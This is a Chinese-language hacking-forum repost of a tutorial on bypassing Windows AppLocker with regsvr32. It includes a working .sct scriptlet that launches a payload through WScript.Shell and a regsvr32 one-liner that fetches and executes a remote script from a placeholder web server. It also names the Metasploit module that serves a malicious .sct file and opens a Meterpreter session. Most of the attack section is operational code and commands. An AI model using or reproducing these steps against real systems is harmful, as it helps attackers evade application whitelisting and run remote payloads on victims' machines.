搜索
查看: 851|回复: 0

利用Regsvr32绕过Applocker的限制策略

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-10-20 20:03:32 | 显示全部楼层 |阅读模式
原文链接:http://www.freebuf.com/articles/terminal/135391.html

AppLocker的设计初衷就是为了帮助管理员Windows安装文件,可执行文件以及用户脚本的执行。从各种各样的奇淫巧计中我们得知这些限制是可以绕过的,例如在windows环境下通过AppLocker配置以限制脚本的执行,利用regsrv32命令行工具就可以完成绕过。

[/url]

regsvr32是windows命令行实用工具用于注册动态链接库文件,向系统注册控件或者卸载控件的命令。[url=https://twitter.com/subtee]Casey Smith发现通过调用regsrv32实用程序执行一条命令或者.sct文件有可能绕过AppLocker的脚本规则。由于该实用程序是由微软官方签名的所以好处多多啦,支持TLS加密,遵循重定向方式,不会在磁盘上留下痕迹。

以下脚本为Casey Smith提供的代码修改版,我们仅调用 calc.exe或cmd.exe。如果允许使用命令行提示符,脚本将在目标系统上执行自定义二进制代码:

  1. <?XML version="1.0"?>
  2. <scriptlet>
  3. <registration         
  4. progid="Pentest"      
  5. classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
  6. <script language="JScript">

  7. <![CDATA[   
  8. var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe");
  9. ]]>

  10. </script>
  11. </registration>
  12. </scriptlet>
复制代码

regsvr32实用工具可从托管的web服务器上请求以及执行脚本:

  1. regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll
复制代码

[/url]

regsrv32指令选项:

当然也可以利用regsvr32在本地运行存储的有效载荷:

该命令将直接从托管文件的web服务器上执行脚本,嵌入.sct文件的JavaScript代码将引导pentestlab3.exe程序在命令提示符下执行。
[url=http://image.3001.net/images/20170522/14954429292202.png]

由于pentestlab3是一个Metasploit payload,所以随后会打开一个Meterpreter会话:



当然,直接执行脚本还是会被拦截。但通过上面方法使用regsvr32进行绕过是可以的。


Metasploit

Metasploit框架有一个特定的有效载荷,可用于通过Regsvr32实用程序实现自动化绕过AppLocker

  1. exploit/windows/misc/regsvr32_applocker_bypass_server
复制代码

该模块将启用一个用于存储恶意.sct文件的web服务,同时也提供用于在目标系统下执行的命令

[/url]

命令执行后regsvr32将从web服务器请求.sct文件,然后执行PowerShell payload

[url=http://image.3001.net/images/20170522/14954430117140.png]

最后成功绕过绕过AppLocker限制

[/url]

参考资源

[url=https://www.rapid7.com/db/modules/exploit/windows/misc/regsvr32_applocker_bypass_server]https://www.rapid7.com/db/modules/exploit/windows/misc/regsvr32_applocker_bypass_server

http://subt0x10.blogspot.co.uk/2017/04/bypass-application-whitelisting-script.html


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表